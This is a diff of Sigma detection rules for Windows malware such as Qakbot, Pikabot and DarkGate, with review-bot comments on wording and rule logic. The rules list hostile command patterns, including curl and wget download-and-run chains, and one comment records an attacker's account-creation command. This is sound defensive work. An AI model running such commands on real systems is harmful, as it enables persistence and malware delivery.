diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml index 1e3bde239..aa8a42e10 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml @@ -1,9 +1,7 @@ title: COLDSTEEL RAT Cleanup Command Execution id: 88516f06-ebe0-47ad-858e-ae9fd060ddea status: experimental -description: Detects the creation of a "rundll32" process from the ColdSteel persistence - service to initiate the cleanup command by calling one of its own exports. This - functionality is not present in "MileStone2017" and some "MileStone2016" samples +description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -27,7 +25,7 @@ detection: - ' -k msupdate2' - ' -k alg' Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: - UpdateDriverForPlugAndPlayDevicesW - ServiceMain - DiUninstallDevice diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml index 0e2b80b76..75ea8e099 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml 
@@ -1,8 +1,7 @@ title: COLDSTEEL RAT Service Persistence Execution id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd status: experimental -description: Detects the creation of an "svchost" process with specific command line - flags, that were seen present and used by ColdSteel RAT +description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: X__Junior (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \svchost.exe - CommandLine|endswith: + CommandLine|endswith: - ' -k msupdate' - ' -k msupdate2' - ' -k alg' diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml index deb1fb9b0..166d884e9 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml @@ -1,8 +1,7 @@ title: Potential COLDSTEEL RAT Windows User Creation id: 95214813-4c7a-4a50-921b-ee5c538e1d16 status: experimental -description: Detects creation of a new user profile with a specific username, seen - being used by some variants of the COLDSTEEL RAT. +description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml index 3abaf07fe..54b1e0fec 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml @@ -1,18 +1,11 @@ title: DarkGate - Autoit3.EXE File Creation By Uncommon Process id: 1a433e1d-03d2-47a6-8063-ece992cf4e73 status: experimental -description: 'Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious - processes used to create Autoit3.exe. - - This activity has been associated with DarkGate malware, which uses Autoit3.exe - to execute shellcode that performs - - process injection and connects to the DarkGate command-and-control server. Curl, - KeyScramblerLogon, and these other - +description: | + Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. + This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs + process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. - - ' references: - https://github.security.telekom.com/2023/08/darkgate-loader.html - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware 
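Review bot: The reflow to a block scalar keeps the typo "consitute" in the last description line. Suggested: `processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.`.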
diff --git a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml index 22bbcca59..9e3477021 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml @@ -1,15 +1,10 @@ title: DarkGate - Autoit3.EXE Execution Parameters id: f8e9aa1c-14f2-4dbd-aa59-b98968ed650d status: experimental -description: 'Detects execution of the legitimate Autoit3 utility from a suspicious - parent process. AutoIt3.exe is used within - - the DarkGate infection chain to execute shellcode that performs process injection - and connects to the DarkGate - +description: | + Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within + the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. - - ' references: - https://github.security.telekom.com/2023/08/darkgate-loader.html - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware @@ -29,8 +24,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_proc: - - Image|endswith: \Autoit3.exe - - OriginalFileName: AutoIt3.exe + - Image|endswith: \Autoit3.exe + - OriginalFileName: AutoIt3.exe selection_parent: ParentImage|endswith: - \cmd.exe diff --git a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml index 97877a6cb..639173004 100644 
--- a/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml @@ -1,8 +1,7 @@ title: DarkGate - User Created Via Net.EXE id: bf906d7b-7070-4642-8383-e404cf26eba5 status: experimental -description: Detects creation of local users via the net.exe command with the name - of "DarkGate" +description: Detects creation of local users via the net.exe command with the name of "DarkGate" references: - Internal Research author: X__Junior (Nextron Systems) @@ -17,6 +16,7 @@ logsource: category: process_creation product: windows detection: + # /c net user /add SafeMode DarkGate0! process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational @@ -24,7 +24,7 @@ detection: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains|all: + CommandLine|contains|all: - user - add - DarkGate diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml b/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml index 69ebcdbb9..43b811a72 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml @@ -1,8 +1,7 @@ title: Griffon Malware Attack Pattern id: bcc6f179-11cd-4111-a9a6-0fab68515cf7 status: experimental -description: Detects process execution patterns related to Griffon malware as reported - by Kaspersky +description: Detects process execution patterns related to Griffon malware as reported by Kaspersky references: - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ author: Nasreddine Bencherchali (Nextron Systems) 
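Review bot: The sample command-line comment added in the `@@ -17,6 +16,7 @@` hunk sits directly under `detection:`, above the `process_creation:` log-source block, rather than next to the `CommandLine|contains|all:` selection it illustrates in the following hunk. Moving it above that selection, and labelling it, e.g. `# Observed command line: /c net user /add SafeMode DarkGate0!`, keeps the example next to the three substrings it justifies.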
@@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \local\temp\ - //b /e:jscript - .txt diff --git a/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml b/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml index 1100af5a6..669f4efd6 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml @@ -1,9 +1,7 @@ title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 id: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5 status: experimental -description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with - the export function "DllRegisterServer". This behaviour was often seen used by - malware and especially IcedID +description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID references: - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/ - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ @@ -23,9 +21,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \rundll32.exe - CommandLine|endswith: - - \1.dll, DllRegisterServer - - ' 1.dll, DllRegisterServer' + CommandLine|endswith: + - \1.dll, DllRegisterServer # In case of full path exec + - ' 1.dll, DllRegisterServer' # In case of direct exec condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml index 610e78d22..524016fab 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml @@ -1,13 +1,9 @@ title: Potential Pikabot C2 Activity - Suspicious Process Created By Rundll32.EXE id: cae6cee6-0244-44d2-84ed-e65f548eb7dc status: experimental -description: 'Detects the execution of rundll32 that leads to an external network - connection. - - The malware Pikabot has been seen to use this technique to initiate C2-communication - through hard-coded Windows binaries. - - ' +description: | + Detects the execution of rundll32 that leads to an external network connection. + The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. references: - https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44 author: Andreas Braathen (mnemonic.io) @@ -20,9 +16,7 @@ tags: logsource: product: windows category: network_connection - definition: 'Requirements: By default the network_connection type event might - not contain the ParentImage. Make sure you collect such fields in order to - use this rule' + definition: 'Requirements: By default the network_connection type event might not contain the ParentImage. Make sure you collect such fields in order to use this rule' detection: network_connection: EventID: 3 @@ -30,6 +24,7 @@ detection: selection: ParentImage|endswith: \rundll32.exe Image|endswith: + # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware - \searchprotocolhost.exe - \sndvol.exe - \wermgr.exe 
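Review bot: The reflowed `definition` in the `@@ -20,9 +16,7 @@` hunk says the network_connection event "might not contain the ParentImage" by default; Sysmon event ID 3, which the rule pins with `EventID: 3` and the Sysmon channel, has no ParentImage field at all, so without a pipeline that enriches events with parent-process data the rule can never match. Saying so directly avoids false confidence: `definition: 'Requirements: Sysmon Event ID 3 does not carry ParentImage; this rule requires log enrichment that adds the parent process image'`. The `GrandParentImage` definition in `proc_creation_win_malware_pikabot_rundll32_discovery.yml` has the same issue, since Sysmon event ID 1 carries ParentImage but not GrandParentImage.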
diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
index 52c9fa5c0..b6bc629fb 100644
--- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
+++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
@@ -1,18 +1,10 @@ title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE id: e5144106-8198-4f6e-bfc2-0a551cc8dd94 status: experimental -description: 'Detects the execution of concatenated commands via "cmd.exe". Pikabot - often executes a combination of multiple commands via the command handler "cmd - /c" in order to download and execute additional payloads. - - Commands such as "curl", "wget" in order to download extra payloads. "ping" and - "timeout" are abused to introduce delays in the command execution and "Rundll32" - is also used to execute malicious DLL files. - - In the observed Pikabot infections, a combination of the commands described above - are used to orchestrate the download and execution of malicious DLL files. - - ' +description: | + Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. + Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. + In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. references: - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt 
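Review bot: The second line of the reflowed description is a sentence fragment, `Commands such as "curl", "wget" in order to download extra payloads.` has no verb. Suggested: `Commands such as "curl" and "wget" are used to download extra payloads, while "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is used to execute malicious DLL files.`.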
@@ -33,21 +25,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - cmd - /c selection_pipes: - CommandLine|contains: + CommandLine|contains: - ' & ' - ' || ' selection_commands_1: - CommandLine|contains: + CommandLine|contains: - ' curl' - ' wget' - ' timeout ' - ' ping ' selection_commands_2: - CommandLine|contains: + CommandLine|contains: - ' rundll32' - ' mkdir ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml index 8cb1b5b3e..fa0d2a095 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml @@ -1,13 +1,9 @@ title: Potential Pikabot Discovery Activity - Suspicious Process Created By Rundll32.EXE id: 698d4431-514f-4c82-af4d-cf573872a9f5 status: experimental -description: 'Detects the execution of rundll32 that leads to system discovery activity, - such as incl. network, user info and domain groups. - - The malware Pikabot has been seen to use this technique as part of its C2-botnet - registration with a short collection time frame (less than 1 minute). - - ' +description: | + Detects the execution of rundll32 that leads to system discovery activity, such as incl. network, user info and domain groups. + The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). references: - https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242 author: Andreas Braathen (mnemonic.io) 
@@ -22,16 +18,15 @@ tags: logsource: product: windows category: process_creation - definition: 'Requirements: By default the process_creation type event might not - contain the GrandParentImage. Make sure you collect such fields in order to - use this rule' + definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule' detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: GrandParentImage|endswith: \rundll32.exe - CommandLine: + CommandLine: + # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware - ipconfig.exe /all - netstat.exe -aon - whoami.exe /all diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml index e43f24ac5..1c4470c16 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml 
@@ -1,13 +1,9 @@ title: Potential Pikabot Hollowing Activity - Suspicious Process Created By Rundll32.EXE id: d8937fe7-42d5-4b4d-8178-e089c908f63f status: experimental -description: 'Detects the execution of rundll32 that leads to the invocation of legitimate - Windows binaries. - - The malware Pikabot has been seen to use this technique for process hollowing - through hard-coded Windows binaries - - ' +description: | + Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. + The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries references: - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62 author: Andreas Braathen (mnemonic.io) @@ -27,6 +23,7 @@ detection: selection: ParentImage|endswith: \rundll32.exe Image|endswith: + # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware - \searchprotocolhost.exe - \sndvol.exe - \wermgr.exe diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml index 0a3d52c10..e9e778b04 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml 
@@ -1,9 +1,7 @@ title: Qakbot Regsvr32 Calc Pattern id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9 status: experimental -description: Detects a specific command line of "regsvr32" where the "calc" keyword - is used in conjunction with the "/s" flag. This behavior is often seen used by - Qakbot +description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot references: - https://github.com/pr0xylife/Qakbot/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +20,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \regsvr32.exe - CommandLine|contains: + CommandLine|contains: - ' /s' - ' -s' - CommandLine|endswith: ' calc' + CommandLine|endswith: ' calc' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml index 876ed7144..d69887891 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml @@ -1,8 +1,7 @@ title: Potential Qakbot Rundll32 Execution id: cf879ffb-793a-4753-9a14-bc8f37cc90df status: experimental -description: Detects specific process tree behavior of a "rundll32" execution often - linked with potential Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) 
@@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_paths: ParentImage|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -29,13 +29,14 @@ detection: - \pwsh.exe - \wscript.exe Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ selection_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml index 56ab42047..d10847dff 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml @@ -1,8 +1,7 @@ title: Qakbot Rundll32 Exports Execution id: 339ed3d6-5490-46d0-96a7-8abe33078f58 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution with - exports linked with Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) @@ -22,6 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_paths: ParentImage|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe 
@@ -30,14 +30,16 @@ detection: - \pwsh.exe - \wscript.exe Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ selection_exports: - CommandLine|endswith: - - aslr + CommandLine|endswith: + # Note: Only add additional exports seen used by Qakbot + - aslr # https://tria.ge/230524-scgq9add9v/behavioral1#report - bind - DrawThemeIcon - GG10 @@ -47,7 +49,7 @@ detection: - LS88 - Motd - N115 - - next + - next # https://tria.ge/230530-n3rxpahf9w/behavioral2 - Nikn - print - qqqb diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml index 8f709f058..eefac0361 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml @@ -1,9 +1,7 @@ title: Qakbot Rundll32 Fake DLL Extension Execution id: bfd34392-c591-4009-b938-9fd985a28b85 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution where - the DLL doesn't have the ".dll" extension. This is often linked with potential - Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 
@@ -22,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -30,13 +29,14 @@ detection: - \pwsh.exe - \wscript.exe Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ filter_main_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml index 6887b2aaf..d3de5f741 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml @@ -1,8 +1,7 @@ title: Qakbot Uninstaller Execution id: bc309b7a-3c29-4937-a4a3-e232473f9168 status: experimental -description: Detects the execution of the Qakbot uninstaller file mentioned in the - USAO-CDCA document on the disruption of the Qakbot malware and botnet +description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet references: - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community 
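Review bot: The exclusion `filter_main_extension: CommandLine|contains: .dll` in the second hunk tests for the substring anywhere on the command line, not on the file token rundll32 actually loads, so a non-DLL payload whose path or export argument happens to contain `.dll` (for example a file named `update.dll.dat` under `\AppData\Local\Temp\`) is silently filtered out of this "fake DLL extension" rule. The behaviour may be an accepted trade-off, but it is not stated anywhere in the rule; suggest a comment above the filter such as `# Note: '.dll' is matched anywhere on the command line, so payloads whose path merely contains '.dll' are excluded`. The same `contains: .dll` substring is used as a positive selector in the sibling `proc_creation_win_malware_qakbot_rundll32_execution.yml`, so the two rules partition on the substring rather than on the real extension.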
@@ -22,13 +21,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \QbotUninstall.exe - - Hashes|contains: - - IMPHASH=E772C815072311D6FB8C3390743E6BE5 - - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 - - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 - - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 - - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 + - Image|endswith: \QbotUninstall.exe + - Hashes|contains: + - IMPHASH=E772C815072311D6FB8C3390743E6BE5 + - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 + - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 + - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 + - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml b/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml index 0ea26ecda..61985a141 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml 
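Review bot: `Hashes|contains: IMPHASH=E772C815072311D6FB8C3390743E6BE5` sits as an independent OR branch next to the SHA256 entries, so any binary with the same import hash will fire this rule, and an imphash is shared by unrelated binaries built from the same toolchain or template; the `falsepositives: Unlikely` entry does not reflect that weaker branch. Suggest a comment on the IMPHASH line, e.g. `# Note: IMPHASH is shared across binaries with identical import tables; treat an IMPHASH-only hit as lower confidence than a SHA256 hit`. Separately, the SHA256 and IMPHASH values only appear in the Sysmon `Hashes` field when the Sysmon `HashAlgorithms` option is configured to emit them (as far as I recall a default configuration emits SHA1 only), so the hash branch may never match on some deployments and the `Image|endswith: \QbotUninstall.exe` branch becomes the only coverage.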
